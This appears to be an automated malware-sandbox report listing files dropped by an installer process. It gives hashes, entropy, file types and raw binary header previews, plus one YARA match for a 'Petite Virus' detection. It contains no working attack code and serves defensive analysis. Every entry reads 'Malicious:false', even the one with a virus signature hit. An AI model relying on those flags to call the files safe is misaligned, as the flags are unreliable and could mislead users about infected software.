                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):112640
                                                                            Entropy (8bit):6.540227486061059
                                                                            Encrypted:false
                                                                            SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                            MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                            SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                            SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                            SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):123406
                                                                            Entropy (8bit):6.263889638223575
                                                                            Encrypted:false
                                                                            SSDEEP:1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
                                                                            MD5:B49ECFA819479C3DCD97FAE2A8AB6EC6
                                                                            SHA1:1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
                                                                            SHA-256:B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
                                                                            SHA-512:18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................R.......d>..........p....@...........................@......^........ ...............................@.4...................................................................................|.@.@............................text....Q.......R..................`.P`.data...\....p.......V..............@.@..rdata...a.......b...X..............@.`@/4..................................@.0@.bss.....c>...........................`..idata..4.....@.....................@.0..CRT....4.....@.....................@.0..tls..........@.....................@.0.................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):16910
                                                                            Entropy (8bit):5.289608933932413
                                                                            Encrypted:false
                                                                            SSDEEP:384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
                                                                            MD5:2F040608E68E679DD42B7D8D3FCA563E
                                                                            SHA1:4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
                                                                            SHA-256:6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
                                                                            SHA-512:718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):214016
                                                                            Entropy (8bit):6.676457645865373
                                                                            Encrypted:false
                                                                            SSDEEP:3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
                                                                            MD5:2C747F19BF1295EBBDAB9FB14BB19EE2
                                                                            SHA1:6F3B71826C51C739D6BB75085E634B2B2EF538BC
                                                                            SHA-256:D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
                                                                            SHA-512:C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):512014
                                                                            Entropy (8bit):6.566561154468342
                                                                            Encrypted:false
                                                                            SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                            MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                            SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                            SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                            SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):906766
                                                                            Entropy (8bit):6.450201653594769
                                                                            Encrypted:false
                                                                            SSDEEP:24576:sxJadtgtogJr8nFWojn51vDBgpOpJyqMvDQAmJ:bWoer+Fhjn51vDBgpKMvDeJ
                                                                            MD5:AF785965AB0BF2474B3DD6E53DA2F368
                                                                            SHA1:EF9EECBD07CCBD3069B30AA1671C2093FA38FEB6
                                                                            SHA-256:8CDF4CAD48406CDB2FF6F4F08A8BCAF41B9A5A656CC341F2757B610A7ACA706A
                                                                            SHA-512:5F69C61E38D6930F8084DCE001BD592C681850F073F1B82E2914F448750E7514E2B0F8F7591BCB089C84D91FC9F51E96CFC03D204AE052564820723E57B6FE27
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).R...................p...............................P......5.....@... .........................WD..............p.......................|;...........................+......................X................................text....Q.......R..................`..`.data...L....p.......V..............@....rdata...............Z..............@..@/4...........p.......F..............@..@.bss....4....p...........................edata..WD.......F...>..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc...p...........................@..@.reloc..|;.......<..................@..B........................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):112640
                                                                            Entropy (8bit):6.540227486061059
                                                                            Encrypted:false
                                                                            SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                            MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                            SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                            SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                            SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                            Malicious:false
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):315918
                                                                            Entropy (8bit):6.5736483262229735
                                                                            Encrypted:false
                                                                            SSDEEP:6144:zvhrZEi7+khFXxn+m0GJjExfTKqyNwEozbpT80kqD6jD1TlT5Tjalc:zvz17FhtBnLot8XD1T3ac
                                                                            MD5:201EA988661F3D1F9CA5D93DA83425E7
                                                                            SHA1:D0294DF7BA1F6CB0290E1EFEBB5B627A11C8B1F5
                                                                            SHA-256:4E4224B946A584B3D32BBABB8665B67D821BB8D15AB4C1CC4C39C71708298A39
                                                                            SHA-512:6E6FA44CE2E07177DEC6E62D0BEE5B5D3E23A243D9373FB8C6EEECEC6C6150CBD457ED8B8C84AB29133DFE954550CA972DEC504069CC411BD1193A24EA98AAEE
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........R...................................................+....@... ......................0.......@.......p......................................................4S......................tA..$............................text...............................`..`.data...............................@....rdata...o.......p..................@..@/4......d`...`...b...D..............@..@.bss.....P...............................edata.......0......................@..@.idata.......@......................@....CRT....,....P......................@....tls.........`......................@....rsrc........p......................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):7910
                                                                            Entropy (8bit):6.931925007191986
                                                                            Encrypted:false
                                                                            SSDEEP:192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
                                                                            MD5:1268DEA570A7511FDC8E70C1149F6743
                                                                            SHA1:1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
                                                                            SHA-256:F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
                                                                            SHA-512:E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
                                                                            Malicious:false
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-UT0J0.tmp, Author: Joe Security
                                                                            Preview:MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):13838
                                                                            Entropy (8bit):5.173769974589746
                                                                            Encrypted:false
                                                                            SSDEEP:192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
                                                                            MD5:9C55B3E5ED1365E82AE9D5DA3EAEC9F2
                                                                            SHA1:BB3D30805A84C6F0803BE549C070F21C735E10A9
                                                                            SHA-256:D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
                                                                            SHA-512:EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):31936
                                                                            Entropy (8bit):6.6461204214578
                                                                            Encrypted:false
                                                                            SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
                                                                            MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
                                                                            SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
                                                                            SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
                                                                            SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):967168
                                                                            Entropy (8bit):6.500850562754145
                                                                            Encrypted:false
                                                                            SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                            MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                            SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                            SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                            SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                            Category:dropped
                                                                            Size (bytes):506871
                                                                            Entropy (8bit):7.998074018431883
                                                                            Encrypted:true
                                                                            SSDEEP:12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
                                                                            MD5:D52F8AE89AC65F755C28A95C274C1FFE
                                                                            SHA1:50D581469FF0648EE628A027396F39598995D8B0
                                                                            SHA-256:2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
                                                                            SHA-512:B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
                                                                            Malicious:false
                                                                            Preview:PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...*."......US.R.SB....i.....T.R.....**..3./;/..Q.].{....:s=t.c....|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx|...}MA.n*.].q:!]iB`....|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o*..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O..*..P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                            Category:dropped
                                                                            Size (bytes):506871
                                                                            Entropy (8bit):7.998074018431883
                                                                            Encrypted:true
                                                                            SSDEEP:12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
                                                                            MD5:D52F8AE89AC65F755C28A95C274C1FFE
                                                                            SHA1:50D581469FF0648EE628A027396F39598995D8B0
                                                                            SHA-256:2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
                                                                            SHA-512:B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
                                                                            Malicious:false
                                                                            Preview:PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...*."......US.R.SB....i.....T.R.....**..3./;/..Q.].{....:s=t.c....|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx|...}MA.n*.].q:!]iB`....|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o*..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O..*..P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):512014
                                                                            Entropy (8bit):6.566561154468342
                                                                            Encrypted:false
                                                                            SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                            MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                            SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                            SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                            SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):126478
                                                                            Entropy (8bit):6.268811819718352
                                                                            Encrypted:false
                                                                            SSDEEP:3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
                                                                            MD5:6E93C9C8AADA15890073E74ED8D400C9
                                                                            SHA1:94757DBD181346C7933694EA7D217B2B7977CC5F
                                                                            SHA-256:B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
                                                                            SHA-512:A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):845312
                                                                            Entropy (8bit):6.581151900686739
                                                                            Encrypted:false
                                                                            SSDEEP:24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
                                                                            MD5:00C672988C2B0A2CB818F4D382C1BE5D
                                                                            SHA1:57121C4852B36746146B10B5B97B5A76628F385F
                                                                            SHA-256:4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
                                                                            SHA-512:C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...va.va.va.b..fa.b...a.b..`a.$..ya.$..`a.$..1a.b..ua.va.*a. ...a. ..wa. ...wa.vat.wa. ..wa.Richva.................PE..L......c...........!.................F.......0............................... ......u.....@.......................... ...q..t...(....P.......................`..p.......T...........................8...@............0..D............................text............................... ..`.rdata...i...0...j..................@..@.data...............................@....rsrc........P.......(..............@..@.reloc..p....`......................@..B........................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):648384
                                                                            Entropy (8bit):6.666474522542094
                                                                            Encrypted:false
                                                                            SSDEEP:12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
                                                                            MD5:CE7DE939D74321A7D0E9BDF534B89AB9
                                                                            SHA1:56082B4E09A543562297E098A36AADC3338DEEC5
                                                                            SHA-256:A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
                                                                            SHA-512:03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):227328
                                                                            Entropy (8bit):6.641153481093122
                                                                            Encrypted:false
                                                                            SSDEEP:6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
                                                                            MD5:BC824DC1D1417DE0A0E47A30A51428FD
                                                                            SHA1:C909C48C625488508026C57D1ED75A4AE6A7F9DB
                                                                            SHA-256:A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
                                                                            SHA-512:566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):867854
                                                                            Entropy (8bit):4.9264497464202694
                                                                            Encrypted:false
                                                                            SSDEEP:12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
                                                                            MD5:B476CA59D61F11B7C0707A5CF3FE6E89
                                                                            SHA1:1A1E7C291F963C12C9B46E8ED692104C51389E69
                                                                            SHA-256:AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
                                                                            SHA-512:D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
                                                                            Malicious:false
